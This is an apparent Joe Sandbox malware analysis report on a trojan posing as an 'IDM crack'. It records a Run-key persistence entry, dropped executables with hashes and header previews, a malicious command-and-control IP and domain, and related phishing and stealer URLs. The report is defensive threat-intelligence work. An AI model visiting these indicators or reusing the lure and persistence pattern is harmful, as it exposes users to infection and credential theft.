https://www.internetdownloadmanager.com/register/new_faq/functions7.htmlApply	KMj8h32vWy.exe, 00000000.00000002.1631816136.0000000002620000.00000004.00000020.00020000.00000000.sdmp, IDM_6.4x_Crack_v18.1.exe, 00000004.00000000.1630842081.0000000000401000.00000020.00000001.01000000.00000007.sdmp, IDM_6.4x_Crack_v18.1.exe.0.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.internetdownloadmanager.com/register/new_faq/functions7.html	KMj8h32vWy.exe, 00000000.00000002.1631816136.0000000002620000.00000004.00000020.00020000.00000000.sdmp, IDM_6.4x_Crack_v18.1.exe, 00000004.00000000.1630842081.0000000000401000.00000020.00000001.01000000.00000007.sdmp, IDM_6.4x_Crack_v18.1.exe.0.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1669773457.00000000059EC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1649687025.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1657156998.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1814061192.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.softpedia.com/get/PORTABLE-SOFTWARE/Security/Password-Managers---Generators/IDM-Password-	KMj8h32vWy.exe, 00000000.00000002.1631816136.0000000002620000.00000004.00000020.00020000.00000000.sdmp, IDM_6.4x_Crack_v18.1.exe, 00000004.00000000.1630842081.0000000000401000.00000020.00000001.01000000.00000007.sdmp, IDM_6.4x_Crack_v18.1.exe.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1658568749.0000000004981000.00000004.00000800.00020000.00000000.sdmp, Hzoynygqzv.exe, 00000003.00000002.1645792371.000000000306F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 00000007.00000002.1805104418.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Ouopxupnarf.exe, 0000000A.00000002.1869559320.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.softpedia.com/get/PORTABLE-SOFTWARE/System/Backup-and-Recovery/Portable-IDM-Backup-Manage	KMj8h32vWy.exe, 00000000.00000002.1631816136.0000000002620000.00000004.00000020.00020000.00000000.sdmp, IDM_6.4x_Crack_v18.1.exe, 00000004.00000000.1630842081.0000000000401000.00000020.00000001.01000000.00000007.sdmp, IDM_6.4x_Crack_v18.1.exe.0.dr	false		high
http://koti.mbnet.fi/vaultec/	IDM_6.4x_Crack_v18.1.exe.0.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1658568749.0000000004AD6000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.92.253.249	tomx.brasilia.me	Bulgaria		34368	THEZONEBG	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431468
Start date and time:	2024-04-25 08:26:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KMj8h32vWy.exe renamed because original name is a hash value
Original Sample Name:	2AD3527444357F19CD120FA1B8BD2F23.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@17/13@1/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 96% Number of executed functions: 266 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target InstallUtil.exe, PID 7556 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 7852 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 8040 because it is empty
Execution Graph export aborted for target Ouopxupnarf.exe, PID 7760 because it is empty
Execution Graph export aborted for target Ouopxupnarf.exe, PID 7984 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7328 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:26:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ouopxupnarf C:\Users\user\AppData\Roaming\Ouopxupnarf.exe
07:27:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ouopxupnarf C:\Users\user\AppData\Roaming\Ouopxupnarf.exe
08:26:53	API Interceptor	15x Sleep call for process: powershell.exe modified
08:27:00	API Interceptor	1x Sleep call for process: InstallUtil.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
windowsupdatebg.s.llnwi.net	http://womenofgoodworks-my.sharepoint.com/:b:/g/personal/tia_womenofgoodworks_org/EVICmRtg-CVNtsngkb8KQlgBH2LYVfumjH5s-SFbeQjN_Q	Get hash	malicious	HTMLPhisher	Browse	68.142.107.4
	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	68.142.107.4
	GHY7L7VaOL.exe	Get hash	malicious	Unknown	Browse	68.142.107.4
	https://auhsdbfjabsdfjs.z13.web.core.windows.net/Er0Win8helpline76/index.html	Get hash	malicious	TechSupportScam	Browse	68.142.107.4
	4BfhCycV4B.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	69.164.42.0
	https://caringhearts.foundation/wp-includes/widgets/ogk25/ogk/index.php&c=E,1,PBioTuoqxXxVmzOkxu8MYhWQ9ZbRNVLGpsstSuC0GQ2jNcQlIpYbU0K6d3lwsaeoT17vAF7VpKXs0qg9O-hGnfKxM3skSa-Jn2VJH7kX1A,,&typo=1	Get hash	malicious	Unknown	Browse	68.142.107.4
	https://caringhearts.foundation/wp-includes/widgets/ogk25/ogk/index.php&c=E,1,PBioTuoqxXxVmzOkxu8MYhWQ9ZbRNVLGpsstSuC0GQ2jNcQlIpYbU0K6d3lwsaeoT17vAF7VpKXs0qg9O-hGnfKxM3skSa-Jn2VJH7kX1A,,&typo=1	Get hash	malicious	Unknown	Browse	69.164.46.128
	CR-FEDEX_TN-775537409198_Doc.vbs	Get hash	malicious	Unknown	Browse	69.164.46.0
	copy_76499Kxls.vbs	Get hash	malicious	Remcos, GuLoader	Browse	69.164.46.0
	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	69.164.46.128
bg.microsoft.map.fastly.net	https://cos-aliyun8789.towqzg.cn/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://shining-melodic-magnesium.glitch.me/rvicendDev.html	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://univ-paris13-4.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://univ-paris13.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238	Get hash	malicious	Phisher	Browse	199.232.210.172
	https://windowdefalerts-error0x21702-alert-virus-detected.pages.dev/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	199.232.210.172
	https://hkadsgfjadfkhkhdf.z19.web.core.windows.net/Er0Win8helpline76/index.html	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://jiujiuwanka.cn/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://ppo46-secondary.z8.web.core.windows.net/werrx01USAHTML/?bcda=1-833-293-0124	Get hash	malicious	TechSupportScam	Browse	199.232.210.172
	https://pub-839300a9c6054ed7b1c425122a9dd984.r2.dev/doc.html	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEZONEBG	Mt#879161_YAT_ORER_AY27102_3017182_2LAP183.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	91.92.248.36
	F17oc0pNHk.elf	Get hash	malicious	Mirai, Okiru	Browse	91.92.243.252
	H16enGRw3m.elf	Get hash	malicious	Mirai, Okiru	Browse	91.92.243.252
	1HoxbBh9mb.elf	Get hash	malicious	Mirai, Okiru	Browse	91.92.243.252
	PROFOMA INVOICE.js	Get hash	malicious	VjW0rm	Browse	91.92.255.61
	PROFOMA INVOICE.js	Get hash	malicious	VjW0rm	Browse	91.92.255.61
	explorer.exe	Get hash	malicious	RedLine, XWorm	Browse	91.92.252.220
	build.exe	Get hash	malicious	RedLine	Browse	91.92.252.220
	X1.exe	Get hash	malicious	XWorm	Browse	91.92.252.220
	Output.exe	Get hash	malicious	RedLine, XWorm	Browse	91.92.252.220

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	6IB9bf3eyM.exe	Get hash	malicious	RedLine	Browse
C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe	IFhBSXFGph.exe	Get hash	malicious	AsyncRAT	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	69993
Entropy (8bit):	7.99584879649948
Encrypted:	true
SSDEEP:	1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
MD5:	29F65BA8E88C063813CC50A4EA544E93
SHA1:	05A7040D5C127E68C25D81CC51271FFB8BEF3568
SHA-256:	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
SHA-512:	E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[I.hOB."..rK.RQ..}f..f...}....9.\|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..\|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..\|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.2277690063064153
Encrypted:	false
SSDEEP:	6:kKZ/lEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:h/lbkPlE99SNxAhUeVLVt
MD5:	413DFB6A11E1B506F7CBD09F155C5A7D
SHA1:	086AAF720E8B9035F20ADF158AD68B6A4E71397B
SHA-256:	9C80625AF7E3F3CB8419FE70A098EA5B77AA28374B382E7046F779F9ADEBFBFE
SHA-512:	BF9A93C3594F2DB7D72D41530D40A08734A4EBDBDBFBB758CE098D8F077456C918C7AFA2ECD58E55D6DF26B0BE08E8069327AFAD2BD8DC9C089120EBEBC3D712
Malicious:	false
Reputation:	low
Preview:	p...... ........"NA....(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

C:\Users\user\AppData\Local\Hzoynygqzv.exe

Download File

Process:	C:\Users\user\Desktop\KMj8h32vWy.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2266112
Entropy (8bit):	7.9971276799484725
Encrypted:	true
SSDEEP:	49152:+7ltMGnUX+5wSm9J5jqqLY8G1PZcIEDU+I7fIDjkqNS2qRUH4:+AGc+5dm17gxbQU+GMoqNSdUH
MD5:	A6894B09A24E7F7AAE0B17614279BE90
SHA1:	F45AA4D72E401B64FC99ECB4E27DE98125A7D9F5
SHA-256:	599803EE475FA2222E1E1537B60893678D2C53087419BB72758C75B4D8862D65
SHA-512:	26B52D6DFC3A23D3859E978D18010B5E4B7F0E1EA41340FB359854E5A3CCD61F64DB06087901C9BF625466BC388E8C6C9D5479449A0894CFD9F16F7AC1410DDF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67% Antivirus: Virustotal, Detection: 63%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.!f..................!.........N.!.. ....!...@.. ........................"...........`...................................!.L.....!.......................".....................................................\.!.............. ..H............text...d.!.. ....!................. ..`.rsrc.........!.......!.............@..@.reloc........".......".............@..B................H.........!.F............#...!..........................................0..........s................}...........s.............s......~....%:....&~..........s....%.....~....:....~..........s.................(....}.....{....o...............0..j...........(........(......9...........&..s........r...p(....r3..p(....o......s.......s...........s..........o......o......-.....9......o.......9......o.......9......o.......>......<......X.X.8U.....?......<+.....>.......o....8.........o......

C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe

Download File

Process:	C:\Users\user\Desktop\KMj8h32vWy.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	76288
Entropy (8bit):	6.404847400656219
Encrypted:	false
SSDEEP:	768:Jfs8N18U/TZklIrB/zkHsXaH61xxpBf/0y1gGAT/ZHgf4sMM34zCT1Ty:lrf9kY7kyaE8DzjCf4sMM0CFy
MD5:	DCDC109069B6E0D80D776C143FECDE3F
SHA1:	761589C94BA8C2FD57D3AE9666A0FDC0D1B72EB5
SHA-256:	FE44F050AB9EA33F87ACEF449ED57157A331A19956207D6243522676C894E284
SHA-512:	85365775CAA1F85C585B4979519357421EC0239D900513C0AADF28D9D238F6548164C3573141B3E272A6D4376129204A7CEBA9B2C4B31C8FBDFD13CB814B73B9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74% Antivirus: Virustotal, Detection: 70%, Browse
Joe Sandbox View:	Filename: 6IB9bf3eyM.exe, Detection: malicious, Browse Filename: IFhBSXFGph.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................~.......................@..............................................@..............................:...................................................................................................................CODE.....\|.......~.................. ..`DATA....\|...........................@...BSS......................................idata..:...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P...................................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hzoynygqzv.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Hzoynygqzv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	5.354120267532675
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qpAE4KzecKDE4KhKiKhBsXE4qdKm:MIHK5HKH1qHmAHKzecYHKh3okHA
MD5:	16EE64AF7526B49B619695B12E3B111C
SHA1:	9705C47B8323B331FF19798231EE113F50F3B505
SHA-256:	0DB80F91436962FBD00CD09651C67468C81A0805170239298BA85066AE348D29
SHA-512:	F852E00C4B1D297376DB0FB7114C75957765DDE1D92B2822113B9C965E5974C52BBF516E1384823BC5D8DE4EDC7EEF8704EAEAD8FF565EA416E6CDB99285E118
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ouopxupnarf.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Ouopxupnarf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	5.354120267532675
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qpAE4KzecKDE4KhKiKhBsXE4qdKm:MIHK5HKH1qHmAHKzecYHKh3okHA
MD5:	16EE64AF7526B49B619695B12E3B111C
SHA1:	9705C47B8323B331FF19798231EE113F50F3B505
SHA-256:	0DB80F91436962FBD00CD09651C67468C81A0805170239298BA85066AE348D29
SHA-512:	F852E00C4B1D297376DB0FB7114C75957765DDE1D92B2822113B9C965E5974C52BBF516E1384823BC5D8DE4EDC7EEF8704EAEAD8FF565EA416E6CDB99285E118
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:lGLHyIFKL3IZ2KRH9Ougos
MD5:	F84E6CDD505CFBCB0494097AFA246090
SHA1:	53F24F126D2E680CCABE29CFD47BE33B1D41E994
SHA-256:	0697545568ECEF0194E6EBA21C31AD3297E226DF4B4AFCD8AD77223CB3D08887
SHA-512:	5B8F240E4251B7C8B1F5623E76462AB02A13141E5141D9BBA3EBC95169EE9C28958FD1DCA7D9FF5D7FD30207E5457297C1C291DF3DD215EAA7FFE922A1DCF49D
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1xgfeie.tjf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oxd1f2gq.puv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psw0gbbs.gph.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

